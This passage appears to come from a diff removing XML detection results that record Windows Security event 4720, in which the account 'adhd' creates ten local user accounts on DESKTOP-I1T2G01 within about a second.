-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Judy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4693</recordid>
-            <time>2020-06-11 22:05:01.623039600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.6230396Z'/&gt;&lt;EventRecordID&gt;4693&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bryan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1108&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bryan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bryan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4687</recordid>
-            <time>2020-06-11 22:05:01.524795400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.5247954Z'/&gt;&lt;EventRecordID&gt;4687&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kenneth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1107&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kenneth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kenneth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4681</recordid>
-            <time>2020-06-11 22:05:01.446807700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.4468077Z'/&gt;&lt;EventRecordID&gt;4681&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Cheryl&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1106&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Cheryl&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Cheryl</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4675</recordid>
-            <time>2020-06-11 22:05:01.342370800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.3423708Z'/&gt;&lt;EventRecordID&gt;4675&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Madison&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1105&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Madison&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Madison</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4669</recordid>
-            <time>2020-06-11 22:05:01.230116100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.2301161Z'/&gt;&lt;EventRecordID&gt;4669&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Harry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1104&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Harry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Harry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4663</recordid>
-            <time>2020-06-11 22:05:01.82135100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:01.0821351Z'/&gt;&lt;EventRecordID&gt;4663&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Debra&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1103&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Debra&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Debra</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4657</recordid>
-            <time>2020-06-11 22:05:00.979538200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.9795382Z'/&gt;&lt;EventRecordID&gt;4657&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Hannah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1102&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Hannah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Hannah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4651</recordid>
-            <time>2020-06-11 22:05:00.906114600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.9061146Z'/&gt;&lt;EventRecordID&gt;4651&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Justin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1101&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Justin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Justin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4645</recordid>
-            <time>2020-06-11 22:05:00.809700100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:00.8097001Z'/&gt;&lt;EventRecordID&gt;4645&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brenda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1100&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brenda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

